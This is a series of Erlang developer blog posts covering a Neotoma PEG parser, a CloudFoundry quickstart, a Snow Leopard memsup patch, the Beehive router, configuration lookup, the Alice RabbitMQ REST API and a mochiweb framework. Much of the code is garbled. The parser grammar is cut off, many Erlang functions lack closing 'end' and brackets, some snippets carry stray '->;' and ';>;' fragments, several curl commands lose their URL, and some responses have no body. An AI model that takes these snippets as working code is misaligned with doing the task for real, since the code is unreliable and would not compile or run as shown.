        Alright, so remember the very incomplete code example from above that didn't do anything yet, that looks ugly and is exactly 37 lines long? Well, here is a very complete 
        Neotoma version that can parse the entire file:

            % This is the PEG compiler for babysitter configuration files
            config_element  [];
                [""] -> [];
                _ ->
                  Head = proplists:get_value(head, Node),
                  Tail = [R || [_,R] 

            That's it! Looks like a lot, but it's not as bad once you start looking at it. I'll leave this as an exercise to look through it for now. Some hints that I picked up to keep in mind either from Sean Cribbs or from working with the code for a while.*(crlf / !.) at the end of a line means either a newline (note the crlf rule at the bottom) or the EOF character at the end of the file

*The '!' means NOT, it's a negative look-ahead character, so for example, the nonbracketed_string can be zero or more of any character except the crlf

*The 'string' rule can be either a string or the stuff inside of {}s. Notice that the bracketed_string comes first in the string rule, this is why precedence matters. Try it the other way

*You can assign 'variables' to the matches. For instance, look at the bracketed_string rule. The tag is: 'str:'. This will put the tuple: {str, Value} into the Node variable, so you can pull it out later.To actually use this, make sure the neotoma.beam is in your code path (or use the -p(a/z) switch to load it) and type:


If all the syntax is correct, neotoma will generate a parser with the two exported functions \ parse/1\ and \ file/1\, which you can compile and use at your leisure.

To get a copy of the code discussed in this tutorial in full, clone it from this repository here: http://github.com/auser/neotoma_template.

Some quick links before I go:

*Neotoma source

*Video introduction

*Parsing Expression Grammar Wikipedia

*Google groupThanks and I hope this helps you figure out Neotoma. Don't hesitate to ask.

Finding a suitable deployment environment

In this new series on my blog, we'll look at a few different deployment frameworks (as alternatives to Beehive).

VMWare just released their new CloudFoundry framework to the Open-Source world. Obviously, I'm pretty interested in application deployment, so this clearly piqued my interest.

More will follow when I get more experience with CloudFoundry, but here's a quickstart to get your CloudFoundry cloud started with Vagrant and Chef in one command. Enjoy!

git clone git://github.com/auser/cloudfoundry-quickstart.git
cd cloudfoundry-quickstart
bundle install
vagrant init
vagrant up

Or, for the incredibly lazy

git clone git://github.com/auser/cloudfoundry-quickstart.git
cd cloudfoundry-quickstart

Snow Leopard Erlang woes (and the fix!)

After upgrading to Snow Leopard, I found my os_mon erlang application exploded in a very ugly error message.

=CRASH REPORT==== 12-Oct-2009::23:29:20 ===
      initial call: memsup:init/1
      pid: <0.76.0>
      registered_name: memsup
      exception exit: {{badmatch,{error,{fread,input}}},
        in function  gen_server:terminate/6
      ancestors: [os_mon_sup,<0.46.0>]
      messages: []
      links: [<0.47.0>]
      dictionary: []
      trap_exit: true
      status: running
      heap_size: 233
      stack_size: 24
      reductions: 172

After some investigation, it turns out that Snow Leopard changed their output on vm_stat, the tool to look at the memory available on the system. The new output added the line:

Pages speculative:                   42219.

Where the erlang module memsup depends upon that not being there. The erlang developers get the ugliness. In any case, the patch looks like:

--- a/lib/os_mon/src/memsup.erl
+++ b/lib/os_mon/src/memsup.erl
@@ -728,8 +728,12 @@ get_memory_usage({unix,darwin}) ->
        io_lib:fread("Pages active:~d.", skip_to_eol(Str2)),
     {ok, [Inactive],Str4} =
        io_lib:fread("Pages inactive:~d.", skip_to_eol(Str3)),
+         {ok, _,Str5} =
+       io_lib:fread("Pages speculative:~d.", skip_to_eol(Str4)),
     {ok, [Wired],_} =
-       io_lib:fread("Pages wired down:~d.", skip_to_eol(Str4)),
+       io_lib:fread("Pages wired down:~d.", skip_to_eol(Str5)),
+  %     {ok, [Wired],_} =
+  % io_lib:fread("Pages wired down:~d.", skip_to_eol(Str4)),
     NMemUsed  = (Wired + Active + Inactive) * 4000,
     NMemTotal = NMemUsed + Free * 4000,

Save this to a file, such as /tmp/erlang_patch. Full instructions for upgrading your erlang:

git clone git://github.com/mfoemmel/erlang-otp.git
cd erlang-otp
patch -l -i /tmp/erlang_patch -p1
./configure --prefix=/opt/erlang --enable-hipe
make install
export PATH=/opt/erlang/bin:$PATH

After that, you should be able to start os_mon:

1> application:start(sasl).
2> application:start(os_mon).

If it starts, you're done!

Hope this helps.

Fixed typo, thanks to Craig Krigsman

Beehive router architecture


Beehive is an open-source application deployment implementation that uses technologies like squashfs, erlang and ruby. It aims to provide a simple, easy application deployment platform. This post will go over the router portion of Beehive.


Beehive is implemented with two servers. One server is the backend server that sits on the nodes that are available to deploy applications. The other is the router server. Note, these are not exclusive of each other, but there must be a router server that the client connects to and the backend nodes must have knowledge of access to the router. Here are a few specifications for the router of Beehive.

  • Mochiweb will handle the incoming requests
  • Beehive's custom router implementation will receive the request
  • Beehive's router looks up the subdomain host's name in it's known
  • The request is then handled by the backend node by spawning a http client response to the backend nodeThis is the basic diagram for the request handling.

With this in mind, let's get right to the implementation of the router server. We'll come back to the backend server after we flush out the router implementation.

Router server

For the router server, we'll use the following modules (leaving out the obvious application details, like supervisors, etc.):

  • backend_registry.erl
  • app_registry_srv.erl
  • router_srv.erlbackend_registry_srv.erl

This is responsible for keeping track of all the backends the router knows about. When a new backend comes online, it will register itself with the backend_registry on the router node.


This is responsible for keeping track of the current apps or packed applications that the router knows about. At an n-interval, the backend server (on the remote host) checks the node for new applications. If there is a new application found, it calls register to this server.


This is the glue between the two above mentioned servers. And handles messages to connect a client to the backend server that matches up to the requested resource.

Backend registry process

When the backend starts up, it must either be given a router_node, or it assumes the router is located on the same machine at the localhost name.

Application registry

Each backend node has a backend process that pings the system to see if there is a new application present. If there is an application present that was not previously known about, the app registry server is notified and updated.

Lookup routing:

When a request comes in, the router_srv is notified of a new request and asks the app_registry_srv for the list of backends that support the subdomain carrying the application.

Future upgrades

Enhance the application lookup by routing to the fastest responding backend server. This could be done by registering the router's backend server as a "listener" on the backend's backend_srv.

Getting command-line options into erlang

So you have your killer erlang application that possibly could make you millions, but it was written in a test environment. Shoot, how do you change that "on the fly" at the application runtime? There are a many different ways this can be accomplished. This post will go over the basics of this typical issue.


Application variables

Application variables must be declared in the .app file for your application. For instance:

{application, killer_app,
 [{description, "The most killer application ever"},
  {modules, []}, {registered,[]},{applications, [kernel,stdlib,sasl]},
  {env, [
    {key, 'value'} % proplist

From here, the key is settable from the command-line simply by passing it (with a little erlang idiom):

erl -pa ./ebin -killer_app key 'new_value'

From within the application, this can be fetched by looking it up:

Value = case application:get_env(killer_app, key) of
  undefined   -> 'default';
  {ok, V}     -> V

Environment variables

Sometimes it's just easier and the application runtime environment requires that variables need to be fetched from an environment variable. These are also super easy to lookup, arguably even easier:

EnvParam = string:to_upper(erlang:atom_to_list('key')),
Value = case os:getenv(EnvParam) of
  false -> Default;
  E -> E

This can obviously be set the standard way an environment variable is set:

KEY='awesome_value' erl -pa ./ebin

Configuration file

Other times I just want to set my configuration in a file and be done with it, so that deployment is only dependent upon a change of the configuration file. An application configuration file is a newline separated set of proplists. For instance, it might look like:

{port, 8080}.
{log_path, "logs/killer_app.log"}.

These are pretty easy to look up as well, but it's important to note that the variables set here must be in the application configuration file as shown above. Fetching these variables might look something like:

Proplists = case file:consult("config/config.cfg") of
  {ok, C} -> C;
  O -> O
Value = proplists:get_value(key, Proplists).

I tend to like more niceties than this, don't you? When fetching from a configuration file, I tend to use a helper:

-module (config).
-include ("killer_app.hrl").
-compile (export_all).

%% Function: Read the config file () -> {ok, Config} | 
%%                                      {error, Reason}
%% Description: Read the configuration data
read() ->
  case read_1(?CONFIG_FILE) of
    {ok, C} -> {ok, C};
    {error, enoent} -> {error, no_file};
    Err -> Err

read_1(Location) ->
  case file:consult(Location) of
    {ok, C} -> C;
    O -> O
%% Function: get (Key, Config) -> {error, not_found} |
%%                                {ok, Value}
%% Description: Get the value of a config element
get(Key) -> get(Key, read()).
get(_Key, []) ->
  {error, not_found};
get(Key, [{Key, Value} | _Config]) ->
  {ok, Value};
get(Key, [{_Other, _Value} | Config]) ->
  get(Key, Config).

By using that, I can simply call:


Finally, I hate to clutter my code with all the funkiness of fetching an application variable, so I tend to use a utility that cleans it up pretty nicely.

-module (apps).

-export ([search_for_application_value/3]).

% Find the application config value
search_for_application_value(Param, Default, App) ->
  case application:get_env(App, Param) of
    undefined         -> search_for_application_value_from_config(Param, Default);
    {ok, undefined}   -> search_for_application_value_from_config(Param, Default);
    {ok, V}    -> V

search_for_application_value_from_config(Param, Default) ->
    case config:get(Param) of
        {error, _} -> search_for_application_value_from_environment(Param, Default);
        V -> V

search_for_application_value_from_environment(Param, Default) ->
  EnvParam = string:to_upper(erlang:atom_to_list(Param)),
  case os:getenv(EnvParam) of
    false -> Default;
    E -> E

Using this, I can simply call and I get built-in defaults for free:

AppDir = apps:search_for_application_value(port, 8080, killer_app),

Announcing Alice and Wonderland



As a queue server, RabbitMQ is super cool, but my company is hesitant to use it without a nice front-end or access to statistics about the server. So we set out to develop the latest RabbitMQ REST interface, Alice.

Alice is a RESTful interface to the RabbitMQ server that talks directly through erlang's native interface, epmd. The purely RESTful server responds to the same interface as the RabbitMQ's command-line interface and presents a native HTTP interface to the data. Alice is written with Mochiweb.


How to get started.

git clone git://github.com/auser/alice.git cd alice ./start.sh

Currently exposed RESTful routes

/conn - Current connection information
/exchanges - Current exchanges information
/queues - Current queues
/users - Current users
/bindings - Current bindings
/control - Access to the RabbitMQ control
/permissions - Current permissions
/vhosts - Current vhosts

These endpoints all are exposed with the four verbs (get, post, put, delete) and respond in the JSON format, (except the root / endpoint which responds with text/html).



# List users
curl -i http://localhost:9999/users 
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:08:20 GMT
Content-Type: text/json
Content-Length: 19


# Viewing a specific user
curl -i http://localhost:9999/users/guest
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:01:01 GMT
Content-Type: text/json
Content-Length: 17


# If the user is not a user:
curl -i http://localhost:9999/users/bob  
HTTP/1.1 400 Bad Request
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:01:20 GMT
Content-Type: text/json
Content-Length: 20

{"bob":"not a user"}

# Add a user
curl -i -XPOST \
        -d'{"username":"ari", "password":"weak password"}' \

HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Thu, 16 Jul 2009 00:10:35 GMT
Content-Type: text/json
Content-Length: 25


# Deleting a user
curl -i -XDELETE  http://localhost:9999/users/ari
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:19:24 GMT
Content-Type: text/json
Content-Length: 19


Notice that when we list the user that doesn't exist, bob from the second example above, the return is a 400. This is especially useful when you want to access the data programmatically. More on extending Alice below and how to get access to the return value of the requested route.

The same basic usage is applied to all the routes listed, as you can see:


# List connections
curl -i http://localhost:9999/conn
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:30:52 GMT
Content-Type: text/json
Content-Length: 287

{"conn":[{"pid":"...","ip":"","port":"5672","peer_address":"" ...}]}


# List the current exchanges
curl -i http://localhost:9999/exchanges
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:34:14 GMT
Content-Type: text/json
Content-Length: 654



# List the current queues
curl -i http://localhost:9999/queues   
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:35:42 GMT
Content-Type: text/json
Content-Length: 60



# List the current bindings
curl -i http://localhost:9999/bindings
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:36:13 GMT
Content-Type: text/json
Content-Length: 69



# List permissions
curl -i http://localhost:9999/permissions
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:37:32 GMT
Content-Type: text/json
Content-Length: 42


# You can specify permissions on a vhost
curl -i http://localhost:9999/permissions/vhost/root
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:50:33 GMT
Content-Type: text/json
Content-Length: 42

# Setting permissions
curl -i -XPOST -d '{"vhost":"/", "configure":".*", "read":".*", "write":".*"}' \
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:55:33 GMT
Content-Type: text/json
Content-Length: 38



# List vhosts
curl -i http://localhost:9999/vhostsHTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:57:10 GMT
Content-Type: text/json
Content-Length: 16


# Viewing a specific vhost
curl -i http://localhost:9999/vhosts/barneys%20list
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:59:29 GMT
Content-Type: text/json
Content-Length: 25

{"vhosts":"barneys list"}

# If it doesn't exist:
curl -i http://localhost:9999/vhosts/barneys%20listings
HTTP/1.1 400 Bad Request
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:59:59 GMT
Content-Type: text/json
Content-Length: 34

{"barneys listings":"not a vhost"}

# Add a vhost
curl -i http://localhost:9999/vhosts -XPOST -d'{"name":"barneys list"}'
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 07:58:09 GMT
Content-Type: text/json
Content-Length: 31

{"vhosts":["/","barneys list"]}

# Delete a vhost
curl -XDELETE -i http://localhost:9999/vhosts/barneys%20list
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:02:44 GMT
Content-Type: text/json
Content-Length: 16


Now, there is a module in the Alice called control. There are a lot of routes and a lot of functionality built-in here, so let's dig in.


# Getting the status of the server
curl -i http://localhost:9999/control 
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:05:19 GMT
Content-Type: text/json
Content-Length: 151

{"status":[{"applications":["rabbit","mnesia","os_mon","sasl","stdlib","kernel"], \

# Stopping the rabbitmq-server
curl -XPOST -i http://localhost:9999/control/stop  
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:06:02 GMT
Content-Type: text/json
Content-Length: 20


# Starting the rabbitmq-server application
curl -XPOST -i http://localhost:9999/control/start_app
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:06:50 GMT
Content-Type: text/json
Content-Length: 20


# Stopping the rabbitmq-server application
curl -XDELETE -i http://localhost:9999/control/stop_app
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:15:56 GMT
Content-Type: text/json
Content-Length: 20


# Reset the rabbitmq-server application
curl -XPOST -i http://localhost:9999/control/reset    
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:07:15 GMT
Content-Type: text/json
Content-Length: 18


# Or force-resetting the server
curl -XPOST -i http://localhost:9999/control/force_reset
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:07:27 GMT
Content-Type: text/json
Content-Length: 18


# Clustering a set of nodes
curl -XPOST -i http://localhost:9999/control/cluster -d'{"nodes":["bob@otherhost"]}'
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:14:10 GMT
Content-Type: text/json
Content-Length: 20


# Rotating rabbit logs
curl -XPOST -i http://localhost:9999/control/rotate_logs -d'{"prefix":"mn_"}'
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:15:12 GMT
Content-Type: text/json
Content-Length: 25



Alice is written with the intention of being highly extensible and makes it easy to do so. The controllers respond only to the four verbs with pattern-matching on the routes.

For instance, a very basic controller looks like this:

-module (say).
-export ([get/1, post/2, put/2, delete/2]).

get([]) ->; {"hello", ;>;};
get(_Path) ->; {"error", ;>;}.

post(_Path, _Data) ->; {"error", ;>;}.
put(_Path, _Data) ->; {"error", ;>;}.
delete(_Path, _Data) ->; {"error", ;>;}.

There are the 4 RESTful verbs that the controller responds. Now, if you were to compile this in Alice (in src/rest_server/controllers), then the route http://localhost:9999/say would now be accessible. Cool!

curl -i http://localhost:9999/say
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:20:57 GMT
Content-Type: text/json
Content-Length: 17


Now let's add a route to say hello to someone:

-module (say).
-export ([get/1, post/2, put/2, delete/2]).

get([Name]) ->; {"hello", erlang:list_to_binary(Name)};
get([]) ->; {"hello", ;>;};
% ....

curl -i http://localhost:9999/say/ari
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:21:54 GMT
Content-Type: text/json
Content-Length: 15


Finally, with every other verb than get, we are given data to extract. Let's see how to pull some data in a post. The data is given as a proplist with binary keys, we it's pretty easy to pull them out:

% ...
post([], Data) ->;
  Name = erlang:binary_to_list(proplists:get_value(;>;, Data)),
  {"hello back", erlang:list_to_binary(Name)};
post([]) ->; 
% ...

Let's check it:

curl -i http://localhost:9999/say -XPOST -d'{"name":"ari"}'
HTTP/1.1 200 OK
Server: MochiWeb/1.0 (Any of you quaids got a smint?)
Date: Tue, 04 Aug 2009 08:23:54 GMT
Content-Type: text/json
Content-Length: 20

{"hello back":"ari"}

It's as easy as pie to extend Alice.


Wonderland is the webUI to Alice. It is driven by the javascript framework Sammy and Alice in the backend. Because the framework is client-side and accesses the data through ajax), Wonderland can be deployed nearly anywhere.


cd alice
make wonderland



Check these two projects out on github at:

http://github.com/auser/alice http://github.com/auser/wonderland.


*Issue tracker

*Google group

*irc: irc.freenode.net / #poolpartyrbOr feel free to ping me on email (arilerner dot mac dot com) if you have any questions.

Alice, the app


Makefiles making erlang easy

Update (01/04/2010): Added a github repos with a project template for starting new projects here: http://github.com/auser/erlproject_template.

The Rakefile in a ruby project is almost just as important as the code itself. Ask any rubyish to show you their project and you can bet your bottom dollar that nine out of every 10 projects of theirs has a Rakefile (most of the time, it's 10/10). This is one thing that can make starting an erlang project painful... the Makefile (bum bum buuuummmm). Today, I'll share a Makefile (for my own future reference too!) that works really well for me and my projects.

I've attached a sample project directory to get started (for the impatient, you can them here if you'd like to follow along). It includes a sample application file, a sample gen_server and of course all the files in this post. Let's get started:

First, the Makefile:

# Makefile
LIBDIR      = `erl -eval \
  'io:format("~s~n", [code:lib_dir()])' -s init stop -noshell`
VERSION     = 0.0.1
CC              = erlc
ERL         = erl
EBIN            = ebin
CFLAGS      = -I include -pa $(EBIN)
COMPILE     = $(CC) $(CFLAGS) -o $(EBIN)
EBIN_DIRS = $(wildcard deps/*/ebin)

all: mochi ebin compile
all_boot: all make_boot
start: all start_all

  @(cd deps/mochiweb;$(MAKE))

  @$(ERL) -pa $(EBIN_DIRS) -noinput +B \
  -eval 'case make:all() of up_to_date ->; halt(0); \
        error ->; halt(1) end.'

  @echo Generating $(APP) documentation from srcs
  @erl -noinput -eval 'edoc:application($(APP), "./", \
        [{doc, "doc/"}, {files, "src/"}])' -s erlang halt

  (cd ebin; erl -pa ebin -noshell \
    -run make_boot write_scripts rest_app)

  (cd ebin; erl -pa ebin -noshell -sname _name_ -boot _name_)

  @mkdir ebin

  rm -rf ebin/*.beam ebin/erl_crash.dump erl_crash.dump
  rm -rf ebin/*.boot ebin/*.rel ebin/*.script
  rm -rf doc/*.html doc/*.css doc/erlang.png doc/edoc-info

This particular project (not yet announced) uses mochiweb (and it's a good example to show dependencies, so I left it), so we have a task called mochi so that we compile all of the mochiweb sources. Before showing the EMakefile, which is what drives the compile task, it's important to note that there is also a make_boot task that creates a boot file for the project. This is pretty interesting, so we'll dive into that real quick:

% make_boot.erl

write_scripts(Args) ->; 
  [Name] = Args,
  io:format("write_scripts for ~p~n", [Name]),
  Erts = erlang:system_info(version),
  Version = "0.1",
  {value, {kernel, _, Kernel}} = lists:keysearch(kernel, 1,
  {value, {stdlib, _, Stdlib}} = lists:keysearch(stdlib, 1,
  {value, {sasl, _, Sasl}} = lists:keysearch(sasl, 1,

  Rel = "{release, {\"~s\", \"~s\"}, {erts, \"~s\"}, ["
          "{kernel, \"~s\"}, {stdlib, \"~s\"}, 
          {sasl, \"~s\"}, {~s, \"~s\"}]}.",

  Lowername = string:to_lower(Name),

  Filename = lists:flatten(Lowername ++ ".rel"),
  io:format("Writing to ~p (as ~s)~n", [Filename, Lowername]),
  {ok, Fs} = file:open(Filename, [write]),

  io:format(Fs, Rel, [Name, 

  systools:make_script(Lowername, [local]),

To actually write a bootfile, we need to supply the name of the bootfile to the method call, so we call this like so:

% shell command
erl -pa ebin -noshell -run make_boot write_scripts rest_app

Finally, let's make sure we have a .app file in the ebin/ directory, sample one below:

% _name_.app
{application, _name_, [
  {description, "_Name_"},
  {vsn, "0.1"},
  {modules, [_modules_]},
  {env, [
    {port, 9999}
  {registered, [_name_]},
  {applications, [kernel, stdlib]},
  {mod, {_name_, []}}

Lastly, break out the EMakefile so that we can actually compile the project:

% EMakefile
% -*- mode: erlang -*-
{["src/*", "src/*/*", "src/*/*/*"],
 [{i, "include"},
  {outdir, "ebin"},

Hurray, we are almost set. Now let's make a start.sh file so we can just call that to start the application:

# start.sh
cd `dirname $0`
erl -pa $PWD/ebin -pa $PWD/deps/*/ebin \
    -sname alice -s reloader -boot rest_app $1

Easy as pie.

To show you why this is a great setup, simply navigate to the project directory and type

make && start.sh

And your server should start right up.

A quick-tip I've picked up... get rstakeout so that anytime you change a file in the src/ directory, your application will recompile:

rstakeout "make" "src/**/*"

Lemme know if this helps, I love to hear feedback!

Download project files here


I've added a generic makefile generator in my erlang snippet project: Skelerl. Get it on github and type:

makefile app_name

Using mochiweb to create a web framework in erlang

Recently, I used Mochiweb for several projects ( Alice) I've been working on. After some investigation of the current erlang web frameworks, Mochiweb suited our needs well. It's lightweight, fast, open-source and pretty source code. Throughout this post, we'll build a little mochiweb application, so note that it will be available in full for download at the end of the article, but we'll write bits and pieces at a time.

So with no further ado:

Using mochiweb in erlang

Starting mochiweb is pretty straightforward. Just calling the mochiweb_http:start/1 function, we'll start the mochiweb application. This is, to me the most dynamic way to start a mochiweb application. While it can be done in a different way, this allows more flexibility. Notice that we'll be passing a loop function. We'll define that shortly, but for now, just note that it's the function that will be receiving the requests.

-module (mochiweb_server).
-export ([start_mochiweb/1]).

start_mochiweb(Args) ->
  [Port] = Args,
  io:format("Starting mochiweb_http with ~p~n", [Port]),
  mochiweb_http:start([ {port, Port},
                        {loop, fun dispatch_requests/1}]).

Now, as promised, let's look at how to handle we'll handle the requests:

-export ([dispatch_requests/1]).

% ...

dispatch_requests(Req) ->
  Path = Req:get(path),
  Action = clean_path(Path),
  handle(Action, Req).

% Get a clean path
% strips off the query string
clean_path(Path) ->
  case string:str(Path, "?") of
    0 -> Path;
    N -> string:substr(Path, 1, N - 1)

The Req record that is passed in is a mochiweb_request record, which gives us access to all the methods defined in the mochiweb_request record. We'll use the Req:get(path) method to pull out the path. Notice that we are also pulling out the Action the path defines by stripping off any query string at the end. Sweet.

Now, for some nifty request handling, we'll use the handle method to give us the ability to handle requests with Erlang's pattern matching:

handle("/favicon.ico", Req) -> Req:respond({200, [{"Content-Type", "text/html"}], ""});
handle(Path, Req) -> 
    Req:respond({200, [{"Content-Type", "text/html"}], "
### Hello world

Sweet! Digging a little deeper, we can see that any request that is not /favicon.ico is going to respond with Hello World (Also, notice the use of respond on the Req record). The respond method takes a tuple that consists of:

{status, [{proplist_of, headers}], Body}

So obviously we can respond in different ways to our different requests. Let's dig a little deeper and build out some controllers, an obvious enhancement. First, we'll modify our handle method:

handle(Path, Req) ->
  BaseController = lists:concat([top_level_request(clean_path(Path)), "_controller"]),
  CAtom = list_to_atom(BaseController),
  ControllerPath = parse_controller_path(clean_path(Path)),

  case CAtom of
    home ->
      IndexContents = ?ERROR_HTML("Uh oh"),
      Req:ok({"text/html", IndexContents});
    ControllerAtom -> 
    Meth = clean_method(Req:get(method)),
    case Meth of
      get -> 
        run_controller(Req, ControllerAtom, Meth, [ControllerPath]);
      _ -> 
        run_controller(Req, ControllerAtom, Meth, [ControllerPath, decode_data_from_request(Req)])

% parse the controller path
parse_controller_path(CleanPath) ->
  case string:tokens(CleanPath, "/") of
    [] -> [];
    [_RootPath|Rest] -> Rest

% Call the controller action here
run_controller(Req, ControllerAtom, Meth, Args) ->
  case (catch erlang:apply(ControllerAtom, Meth, Args)) of
    {'EXIT', {undef, _}} = E ->
      Req:ok({"text/html", "Unimplemented: there is nothing to see here"});
    {'EXIT', E} -> 
    Body -> 
      Req:ok({"text/html", Body})

% Other methods
% Get the data off the request
decode_data_from_request(Req) ->
  RecvBody = Req:recv_body(),
  Data = case RecvBody of
    > -> erlang:list_to_binary("{}");
    Bin -> Bin
  {struct, Struct} = mochijson2:decode(Data),

% parse the controller path
parse_controller_path(CleanPath) ->
  case string:tokens(CleanPath, "/") of
    [] -> [];
    [_RootPath|Rest] -> Rest

% Get a clean path
% strips off the query string
clean_path(Path) ->
  case string:str(Path, "?") of
    0 -> Path;
    N -> string:substr(Path, 1, N - 1)

top_level_request(Path) ->
  case string:tokens(Path, "/") of
    [CleanPath|_Others] -> CleanPath;
    [] -> "home"

Now we can use any controller with the path appended to call out to a controller of our choosing that respond to the four http methods, get, put, post and delete! To finish off, let's add a controller that responds with our hello world message:

-module (home_controller).
-export ([get/1, post/2, put/2, delete/2]).

get(Path) -> "hello world".

post(_Path, _Data) -> "unhandled".
put(_Path, _Data) -> "unhandled".
delete(_Path, _Data) -> "unhandled".

Now we have an application-scalable web framework written in erlang with mochiweb.

Thanks to damjan for pointing out the clean_path correction.